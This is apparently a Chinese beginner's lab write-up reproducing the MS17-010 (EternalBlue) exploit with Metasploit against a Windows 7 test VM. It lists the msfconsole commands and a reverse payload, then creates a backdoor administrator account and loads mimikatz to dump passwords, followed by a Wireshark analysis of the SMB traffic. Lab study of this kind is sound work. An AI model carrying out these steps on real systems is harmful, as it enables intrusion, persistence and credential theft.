安全小白 整理分享学习过程 欢迎指点 呜呜呜卑微仔、、、
一、实验环境:
1、攻击机:KaliIP:192.168.218.157
文章图片
1)攻击工具:msf
2)分析工具:wireshark
2、靶机:Windows7(旗舰版)IP:192.168.218.160
文章图片
1)开启网络共享(SMB协议)
2)关闭防火墙
3、网卡连接方式:Vmnet8(NAT)
二、实验步骤:
1、测试攻击机与靶机的连通性
文章图片
2.进行MS17-010漏洞扫描
1)启动msf
命令:msfconsole
文章图片
2)搜索ms17_010
命令:search ms17_010
文章图片
3)smb_ms17_010模块进行MS17-010漏洞扫描
文章图片
4)设置攻击载荷
payload模块进行反弹连接
文章图片
5)查看需要设置的模块(带yes的)
文章图片
6)设定监听主机 set lhost 192.168.218.157(kali)
设置扫描的主机(网段)以及端口号SMB协议默认445端口
命令:set rhosts 192.168.218.160/24
文章图片
7)执行exploit(run)命令进行扫描发现目标主机漏洞
文章图片
可以看到监听IP及端口,攻击机与靶机之间成功建立会话
文章图片
出现meterpreter>攻击成功!渗透后信息收集、持续攻击
- 远程显示主机系统信息
文章图片
2)查看用户身份
Meterpreter>getuid
文章图片
3)获得shell控制并新建一个用户
文章图片
4)将此用户加入本地管理员组(后门植入,获取更大的权限)
文章图片
文章图片
- wireshark数据抓包 分析攻击过程
【安全漏洞|ms17-010 永恒之蓝漏洞复现+抓包分析+使用mimikatz抓取密码】
文章图片
- 首先攻击机(Kali Linux)向靶机(Windows 7)发送一个SMB的Negotiate Protocol Request(协商协议请求)数据报,并列出攻击机所支持的SMB协议版本。
- 服务器响应一个SMB的Negotiate Protocol Response (协商协议响应)数据报; (如果无可使用的协议版本则返回0XFFFFH,结束通信。)
- 攻击机(Kali Linux)向靶机(Windows 7)发起一个Session setup X request(会话设置请求)数据报.
文章图片
文章图片
- 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接.
- 靶机(Windows 7)确认身份后发送一个Session Setup X Response(会话设置响应)数据报同意本次连接。
- 协商和认证成功之后,攻击机向靶机发送一个Tree Connect AndX Request(树连接和请求)数据报,列出要访问的网络资源的名称(匿名管道共享)
文章图片
- 服务器会发送一个Tree Connect AndX Response(树连接和响应)数据报,同意访问资源,并列出访问者的权限
文章图片
- 连接到相应资源后,进行正常的网络共享访问
攻击过程重要数据特征
1.NT空载指令
文章图片
2.TRANS 2 攻击负载 拆分
文章图片
3.Response =>MultiplexID:64(攻击成功)
文章图片
文章图片
过程中所遇到的问题:
Exploit completed, but no session was created.(攻击成功但会话未连接)
如果出现以下情况之一,则“无会话已创建”消息
发生:
1)使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞,有一个问题
利用代码,或目标配置有问题。(经检查验证是此问题)
2)使用的漏洞利用被配置为使用不创建的有效载荷
互动会话。在这种情况下,框架无法知道
被剥削者是否工作,因为它没有收到连接
从目标成功时(例如运行记事本)。
如果尝试反向有效载荷,获取该消息和目标服务
不会崩溃,确保您的目标设置是正确的,而且
目标系统正在运行正确版本的易受攻击的软件。
meterpreter中使用mimikatz抓取密码 参考链接:
https://blog.csdn.net/qq_36374896/article/details/107005461?utm_source=app&app_version=4.8.1
- 进去meterpreter后getuid一下-----获得系统管理员权限
文章图片
2. 加载mimikatz模块----load mimikatz
文章图片
文章图片
推荐阅读
- 安全|深入分析H2数据库控制台中无需身份验证的RCE漏洞
- 《网络安全快速入门》|别让数据库的报错信息,暴露了网站的用户数据。
- 网络安全|2021web安全最全学习路线,从入门到入职(含书籍、工具包)
- 渗透测试|2021年网络安全学习路线指导(含视频教程)
- 网络安全|我的网络安全学习之路
- 谷歌以54亿美元收购网络安全公司、数百万惠普设备存在高危漏洞|3月10日全球网络安全热点
- 腾讯安全发布《容器安全在野攻击调查》
- 三星数据被黑客泄露、罗马尼亚加油站网络遭勒索攻击|3月8日全球网络安全热点
- 首届腾讯数字安全创新大赛即将启动,寻找网络安全新力量